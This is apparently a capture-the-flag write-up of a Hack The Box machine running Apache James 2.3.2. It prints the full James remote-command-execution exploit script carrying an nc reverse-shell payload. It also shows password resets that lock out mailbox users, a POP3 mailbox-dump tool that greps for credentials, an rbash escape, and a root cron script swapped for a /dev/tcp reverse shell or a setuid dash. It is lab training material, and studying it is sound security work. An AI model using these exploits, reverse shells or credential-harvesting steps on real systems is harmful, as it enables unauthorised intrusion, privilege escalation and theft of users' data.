1. SCANNING
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.13 [10.10.14.13]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
Aggressive OS guesses: Linux 3.13 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.12 (95%), Linux 3.18 (95%), Linux 3.8 - 3.11 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.4 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(root💀takudaddy)-[/htb/s]
└─# nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
james-admin
Password:
JAMES
Login failed for james-admin
Login id:
password
Password:
^C
┌──(root💀takudaddy)-[/htb/s]
└─# nc 10.10.10.51 119
200 solidstate NNTP Service Ready, posting permitted
id
500 Unknown command
vrfy james
500 Unknown command
help
100 Help text follows
.
?
500 Unknown command
┌──(root💀takudaddy)-[/htb/s]
└─# nmap --script vuln -oA vulnscan 10.10.10.51
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-23 19:20 KST
Nmap scan report for 10.10.10.51
Host is up (0.21s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
|_sslv2-drown:
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.51
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.51:80/
| Form id: name
| Form action: #
|
| Path: http://10.10.10.51:80/index.html
| Form id: name
| Form action: #
|
| Path: http://10.10.10.51:80/about.html
| Form id: name
| Form action: #
|
| Path: http://10.10.10.51:80/services.html
| Form id: name
|_ Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /README.txt: Interesting, a readme.
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)'
| http-sql-injection:
| Possible sqli for queries:
| http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/ie/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/ie/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/ie/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/ie/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|_ http://10.10.10.51:80/assets/js/?C=D%3bO%3dD%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
110/tcp open pop3
|_sslv2-drown:
119/tcp open nntp
|_sslv2-drown:
2. WEB ENUMERATION
┌──(root💀takudaddy)-[/htb]
└─# gobuster dir -f -t 50 -u http://10.10.10.51 -w /usr/share/wordlists/dirb/small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.51
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2021/04/23 19:10:00 Starting gobuster in directory enumeration mode
===============================================================
/assets/ (Status: 200) [Size: 1496]
/images/ (Status: 200) [Size: 2516]
/icons/ (Status: 403) [Size: 292]
Email address found on the site: webadmin@solid-state-security.com
3. EXPLOITATION
┌──(root💀takudaddy)-[/htb/s]
└─# cat attack.py
#!/usr/bin/python
# Python 2 script (print statements, str-based sockets)
#
# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
# Date: 16\10\2014
# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu, Debian
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d
#
# How it works: the admin tool's "adduser" takes the user name, unsanitised, as a
# directory name inside the mail repository, so a name of
# ../../../../../../../../etc/bash_completion.d makes James deliver that user's
# incoming mail into /etc/bash_completion.d. Files in that directory are sourced
# by bash in interactive shells, so the mail body runs the next time someone logs in.
# The stray single quote in MAIL FROM and the lone quote line before the payload
# turn the mail headers into one quoted word that bash skips over harmlessly.

import socket
import sys
import time

# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user
#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root
# reverse shell: run `nc -lvnp 7979` on 10.10.14.13 first; needs a netcat that supports -e
payload = 'nc -e /bin/bash 10.10.14.13 7979 &'

# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'

if len(sys.argv) != 2:
    sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])
    sys.stderr.write("[-]Example: python %s 127.0.0.1\n" % sys.argv[0])
    sys.exit(1)

ip = sys.argv[1]

def recv(s):
    s.recv(1024)
    time.sleep(0.2)

try:
    print "[+]Connecting to James Remote Administration Tool..."
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, 4555))   # the Remote Administration Tool port (see the nmap scan)
    s.recv(1024)
    s.send(user + "\n")
    s.recv(1024)
    s.send(pwd + "\n")
    s.recv(1024)
    print "[+]Creating user..."
    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
    s.recv(1024)
    s.send("quit\n")
    s.close()

    print "[+]Connecting to James SMTP server..."
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, 25))
    s.send("ehlo team@team.pl\r\n")
    recv(s)
    print "[+]Sending payload..."
    s.send("mail from: <'@team.pl>\r\n")
    recv(s)
    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found
    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
    recv(s)
    s.send("data\r\n")
    recv(s)
    s.send("From: team@team.pl\r\n")
    s.send("\r\n")
    s.send("'\n")
    s.send(payload + "\n")
    s.send("\r\n.\r\n")
    recv(s)
    s.send("quit\r\n")
    recv(s)
    s.close()
    print "[+]Done! Payload will be executed once somebody logs in."
except:
    print "Connection failed."
┌──(root💀takudaddy)-[/htb/s]
└─# ./attack.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
┌──(root💀takudaddy)-[/htb]
└─# nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
HELP
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
Unknown command
countusers
Existing accounts 5
adduser takudaddy takudaddy
User takudaddy added
setpassword james takudaddy
Password for james reset
setpassword thomas takudaddy
Password for thomas reset
setpassword john takudaddy
Password for john reset
setpassword mindy takudaddy
Password for mindy reset
setpasswrod mailadmin takudaddy
Unknown command setpasswrod mailadmin takudaddy
setpassword mailadmin takudaddy
Password for mailadmin reset
Every mailbox password has just been reset to takudaddy through the admin tool, so the mail can now be read with Thunderbird. To check directly without a mail client, connect to port 110 with telnet and speak POP3 (USER, PASS, RETR). Note that resetting passwords is destructive and noisy: the legitimate users are locked out until somebody notices, which is fine in a lab but not on a real engagement.
┌──(root💀takudaddy)-[/htb/s]
└─# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS takudaddy
+OK Welcome mindy
RETR
-ERR Usage: RETR [mail number]
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
SSH credentials from the second message:
username: mindy
pass: P@55W0rd1!2@
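The telnet session above can be scripted. The following Python 3 client is an added example and not part of the original write-up: it logs in, pulls every message with STAT/RETR, undoes POP3 dot-stuffing and greps the bodies for credential lines, which is what you want when five mailboxes have just been opened up. FAKE_MAILBOX and fake_pop3_server() are constructed sample data and a hypothetical stand-in server so the demo runs offline; point pop3_dump() at the real host on port 110 to use it for real.

```python
#!/usr/bin/env python3
"""POP3 (RFC 1939) mailbox dump plus credential grep: automates the manual
USER/PASS/RETR session above for a whole mailbox. Added example, not code from
the original write-up. FAKE_MAILBOX and fake_pop3_server() are a constructed
stand-in so it runs offline; aim pop3_dump() at a real host:110 for real use."""
import re
import socket
import threading

CRED_RE = re.compile(r"^\s*(username|user|login|password|pass)\s*:\s*(\S+)", re.I | re.M)

def _readline(rd):
    line = rd.readline()
    if not line:                                   # peer went away mid-session
        raise ConnectionError("server closed the connection")
    return line.decode("latin-1").rstrip("\r\n")

def _cmd(sock, rd, line):
    """Send one command and return its status line; raise on anything but +OK."""
    sock.sendall((line + "\r\n").encode())
    status = _readline(rd)
    if not status.startswith("+OK"):
        raise RuntimeError("%s failed: %s" % (line.split()[0], status))
    return status

def _read_multiline(rd):
    """Collect a '.'-terminated response, undoing dot-stuffing ('..x' on the wire is '.x')."""
    lines = []
    while True:
        line = _readline(rd)
        if line == ".":
            return "\n".join(lines)
        lines.append(line[1:] if line.startswith("..") else line)

def pop3_dump(host, port, user, password, timeout=10):
    """Log in and return [(message_number, raw_message), ...] for the whole mailbox."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        rd = sock.makefile("rb")
        _readline(rd)                                  # greeting banner
        _cmd(sock, rd, "USER " + user)
        _cmd(sock, rd, "PASS " + password)
        count = int(_cmd(sock, rd, "STAT").split()[1])  # "+OK <count> <octets>"
        msgs = []
        for n in range(1, count + 1):
            _cmd(sock, rd, "RETR %d" % n)
            msgs.append((n, _read_multiline(rd)))
        _cmd(sock, rd, "QUIT")
    return msgs

def find_credentials(msgs):
    """Return (message_number, field, value) for every credential-looking line."""
    return [(n, k.lower(), v) for n, body in msgs for k, v in CRED_RE.findall(body)]

FAKE_MAILBOX = {"mindy": ("takudaddy", [                 # constructed sample data
    "From: mailadmin@localhost\r\nSubject: Welcome\r\n\r\nDear Mindy,\r\nWelcome aboard.\r\n",
    "From: mailadmin@localhost\r\nSubject: Your Access\r\n\r\n"
    "username: mindy\r\npass: P@55W0rd1!2@\r\n.hidden line\r\n",   # leading dot exercises stuffing
])}

def fake_pop3_server():
    """Answer one connection from FAKE_MAILBOX on 127.0.0.1; returns the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        srv.close()
        with conn, conn.makefile("rb") as rd:
            user, box = None, None
            conn.sendall(b"+OK fake POP3 ready\r\n")
            while True:
                raw = rd.readline()
                if not raw:
                    break
                verb, _, arg = raw.decode().strip().partition(" ")
                verb = verb.upper()
                if verb == "USER":
                    user, reply = arg, "+OK"
                elif verb == "PASS" and user in FAKE_MAILBOX and FAKE_MAILBOX[user][0] == arg:
                    box, reply = FAKE_MAILBOX[user][1], "+OK Welcome " + user
                elif verb == "STAT" and box is not None:
                    reply = "+OK %d %d" % (len(box), sum(len(m) for m in box))
                elif verb == "RETR" and box is not None and arg.isdigit() and 1 <= int(arg) <= len(box):
                    reply = "+OK Message follows\r\n" + box[int(arg) - 1].replace("\r\n.", "\r\n..") + "."
                else:
                    reply = "+OK bye" if verb == "QUIT" else "-ERR"
                conn.sendall((reply + "\r\n").encode())
                if verb == "QUIT":
                    break

    threading.Thread(target=serve, daemon=True).start()
    return port

def demo():
    port = fake_pop3_server()
    msgs = pop3_dump("127.0.0.1", port, "mindy", "takudaddy")
    return msgs, find_credentials(msgs)
```

Against the real box, loop over the user list from `listusers` and call pop3_dump() once per account; a `-ERR` on PASS is raised as a RuntimeError so a mailbox whose password was not reset does not silently come back empty.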
┌──(root💀takudaddy)-[/htb]
└─# ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$
Foothold obtained.
4. POST EXPLOITATION & PRIVILEGE ESCALATION
mindy@solidstate:~$ ls -al
total 28
drwxr-x--- 4 mindy mindy 4096 Nov 18 09:38 .
drwxr-xr-x 4 root root 4096 Aug 22 2017 ..
lrwxrwxrwx 1 root root 9 Nov 18 09:38 .bash_history -> /dev/null
-rw-r--r-- 1 root root 0 Aug 22 2017 .bash_logout
-rw-r--r-- 1 root root 338 Aug 22 2017 .bash_profile
-rw-r--r-- 1 root root 1001 Aug 22 2017 .bashrc
drwxr-x--- 2 mindy mindy 4096 Aug 22 2017 bin
-rw------- 1 root root 0 Aug 22 2017 .rhosts
-rw------- 1 root root 0 Aug 22 2017 .shosts
drw------- 2 root root 4096 Aug 22 2017 .ssh
-rw------- 1 mindy mindy 33 Nov 18 09:29 user.txt
mindy@solidstate:~$ cat user.txt
0510e71c2e8c9cb333b36a38080d0dc2
mindy@solidstate:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
usbmux:x:105:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
rtkit:x:106:110:RealtimeKit,,,:/proc:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:108:111::/var/run/dbus:/bin/false
geoclue:x:109:115::/var/lib/geoclue:/bin/false
avahi:x:110:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:111:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:x:112:119::/var/lib/saned:/bin/false
speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
pulse:x:114:120:PulseAudio daemon,,,:/var/run/pulse:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:122:Gnome Display Manager:/var/lib/gdm3:/bin/false
sshd:x:117:65534::/run/sshd:/usr/sbin/nologin
james:x:1000:1000:james:/home/james/:/bin/bash
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash
mindy's login shell is rbash (restricted bash), so what she can run is limited: rbash refuses to change PATH, cd, or execute anything whose name contains a slash, and only the few binaries on her restricted PATH are reachable.
mindy@solidstate:~$ cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
mindy@solidstate:~$ bash
-rbash: bash: command not found
mindy@solidstate:~$ sh
-rbash: sh: command not found
mindy@solidstate:~$
The way around it is to log out and reconnect over ssh, giving bash or sh as the command to run. sshd executes a requested command through the user's login shell non-interactively (rbash -c bash), and the interactive login startup that restricts PATH does not apply to that invocation, so the real bash in /bin is found and comes back unrestricted. Ask for bash, not /bin/bash: rbash rejects command names containing a slash. The shell you get this way has no tty, which is why a pty is spawned with python afterwards (visible in the ps output further down).
┌──(root💀takudaddy)-[/htb]
└─# ssh mindy@10.10.10.51 bash
mindy@10.10.10.51's password:
id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
which python
/usr/bin/python
exit
┌──(root💀takudaddy)-[/htb]
└─# ssh mindy@10.10.10.51 sh
mindy@10.10.10.51's password:
id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
find / -perm -u=s -type f -exec ls -l {} \; 2>/dev/null
-rwsr-xr-x 1 root root 39144 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 38940 Mar 22 2017 /bin/mount
-rwsr-xr-x 1 root root 30112 Jun 23 2016 /bin/fusermount
-rwsr-xr-x 1 root root 68076 Nov 10 2016 /bin/ping
-rwsr-xr-x 1 root root 161520 Feb 26 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26504 Mar 22 2017 /bin/umount
-rwsr-xr-x 1 root root 34920 May 17 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 22304 May 24 2017 /usr/bin/pkexec
-rwsr-xr-x 1 root root 57972 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 39632 May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 48560 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 78340 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-- 1 root dip 363140 Nov 11 2016 /usr/sbin/pppd
-rwsr-xr-x 1 root root 13960 May 24 2017 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 525932 Jun 17 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5480 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 46436 Apr 5 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 9772 Jul 7 2017 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 13672 Jan 14 2017 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ netstat -tul
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:ssh 0.0.0.0:* LISTEN
tcp 0 0 localhost:ipp 0.0.0.0:* LISTEN
tcp6 0 0 [::]:ssh [::]:* LISTEN
tcp6 0 0 localhost:ipp [::]:* LISTEN
tcp6 0 0 [::]:nntp [::]:* LISTEN
tcp6 0 0 [::]:smtp [::]:* LISTEN
tcp6 0 0 [::]:4555 [::]:* LISTEN
tcp6 0 0 [::]:pop3 [::]:* LISTEN
tcp6 0 0 [::]:http [::]:* LISTEN
udp 0 0 0.0.0.0:ipp 0.0.0.0:*
udp 0 0 0.0.0.0:36284 0.0.0.0:*
udp 0 0 0.0.0.0:mdns 0.0.0.0:*
udp 0 0 0.0.0.0:1900 0.0.0.0:*
udp6 0 0 [::]:mdns [::]:*
udp6 0 0 [::]:40505 [::]:*
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ps -ef
....
root 1065 1 0 10:33 ? 00:00:00 /usr/sbin/cups-browsed
mindy 1174 1 0 10:40 ? 00:00:00 bash
mindy 1175 1174 0 10:40 ? 00:00:00 python -c import pty;pty.spawn("
mindy 1176 1175 0 10:40 pts/1 00:00:00 /bin/bash
root 1216 2 0 10:44 ? 00:00:00 [kworker/0:1]
root 1351 394 0 11:03 ? 00:00:00 /usr/sbin/CRON -f
root 1352 1351 0 11:03 ? 00:00:00 /bin/sh -c python /opt/tmp.py
root 1353 1352 0 11:03 ? 00:00:00 python /opt/tmp.py
...
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$
ps shows /opt/tmp.py being executed as root by cron (CRON -f, then /bin/sh -c python /opt/tmp.py), and it does nothing more than wipe /tmp. For the swap below to work the file must be writable by mindy (check with ls -l /opt/tmp.py); if it is, whatever is put there runs as root on the next cron tick. vi does not work properly in this tty-less shell, so write the replacement on the attacking host, fetch it onto the target and copy it over /opt/tmp.py.
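What turned /opt/tmp.py into a privilege-escalation vector is a root cron job executing a file a low-privileged user can modify, and that is worth checking systematically rather than by spotting it in ps. The following Python 3 audit script is an added example, not code from the original write-up: it parses system crontabs (the form with a user column, i.e. /etc/crontab and /etc/cron.d/*), and for every root job reports each absolute path that is writable by the current user, or that sits in a directory the current user can write to. build_demo_crontab() is a constructed fixture (hypothetical paths under a temp directory) so the demo runs anywhere.

```python
#!/usr/bin/env python3
"""Flag root cron jobs whose script, or the directory it lives in, the current
user can write. Added example, not code from the original write-up: it parses
system crontabs (7-field form with a user column: /etc/crontab, /etc/cron.d/*;
per-user "crontab -l" files have no user column and are not handled) and
reports every absolute path in a root job that os.access() says we can modify.
build_demo_crontab() fabricates such a job in a temp directory for the demo."""
import glob
import os
import re
import tempfile

# "m h dom mon dow user command"  or  "@reboot user command"
_JOB_LINE = re.compile(r"^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")
_ABS_PATH = re.compile(r"(/[\w./+-]+)")


def parse_crontab(text):
    """Yield (user, command) per job line; skip blanks, comments and VAR=value lines."""
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or re.match(r"\s*\w+=", line):
            continue
        m = _JOB_LINE.match(line)
        if m:
            yield m.group("user"), m.group("cmd")


def writable_targets(cmd):
    """Absolute paths in cmd we can overwrite, or replace because the parent dir is writable."""
    hits = []
    for path in _ABS_PATH.findall(cmd):
        parent = os.path.dirname(path)
        if os.path.isfile(path) and os.access(path, os.W_OK):
            hits.append((path, "file writable"))
        elif os.path.isdir(parent) and os.access(parent, os.W_OK):
            hits.append((path, "parent directory writable"))
    return hits


def audit(crontab_files):
    """Return (crontab_file, path, reason) for every writable target of a root job."""
    findings = []
    for fname in crontab_files:
        try:
            with open(fname) as fh:
                text = fh.read()
        except OSError:                 # missing or unreadable: skip rather than abort
            continue
        for user, cmd in parse_crontab(text):
            if user == "root":
                findings.extend((fname, path, why) for path, why in writable_targets(cmd))
    return findings


def system_crontabs():
    """The usual system crontab locations on Debian-style hosts."""
    return ["/etc/crontab"] + sorted(glob.glob("/etc/cron.d/*"))


def build_demo_crontab():
    """Constructed fixture: a root job running a script we own, plus two decoys."""
    d = tempfile.mkdtemp(prefix="cronaudit_")
    script = os.path.join(d, "tmp.py")
    with open(script, "w") as fh:
        fh.write("import os\nos.system('rm -r /tmp/*')\n")      # never executed, sample only
    crontab = os.path.join(d, "crontab")
    with open(crontab, "w") as fh:
        fh.write("SHELL=/bin/sh\n# m h dom mon dow user command\n")
        fh.write("*/3 * * * * root python %s\n" % script)                     # the finding
        fh.write("* * * * * mindy python %s\n" % script)                       # not root: ignored
        fh.write("@reboot root %s\n" % os.path.join(d, "missing", "x.sh"))     # nothing writable
    return crontab, script


if __name__ == "__main__":
    demo_crontab, _ = build_demo_crontab()
    for fname, path, why in audit(system_crontabs() + [demo_crontab]):
        print("%s: root job uses %s (%s)" % (fname, path, why))
```

Run it as the low-privileged user, not as root: os.access() answers for the caller, and root can write everything. A job like the one on this box would be reported from /etc/crontab as "/opt/tmp.py (file writable)".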
┌──(root💀takudaddy)-[/htb/s]
└─# cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
    # os.system() runs the string with /bin/sh (dash on Debian), which has no /dev/tcp,
    # so hand the reverse shell to bash explicitly and wire stdin back to the socket
    os.system("bash -c 'bash -i >& /dev/tcp/10.10.14.13/7979 0>&1'")
except:
    sys.exit()
┌──(root💀takudaddy)-[/htb/s]
└─# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Fetch it from that HTTP server into /tmp on the target, copy it over /opt/tmp.py, start the listener and wait a little: the shell comes back on the next cron run.
┌──(root💀takudaddy)-[/htb/s]
└─# nc -lvnp 7979
listening on [any] 7979 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.51] 39414
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
cat /root/root.txt
4f4afb55463c3bc79ab1e906b074953d
Instead of a reverse shell, the same root cron job can plant a setuid shell:
#!/usr/bin/env python
import os
import sys
try:
    os.system("chmod 4755 /bin/dash")   # setuid root: no listener needed
except:
    sys.exit()
Once cron has run it, /bin/dash carries the setuid bit and simply running dash gives a root-privileged shell. dash is the right target because, unlike bash, it does not drop an effective uid that differs from the real uid (bash needs -p for that).
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -l /bin/dash
-rwxr-xr-x 1 root root 124492 Jan 24 2017 /bin/dash
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -l /bin/dash
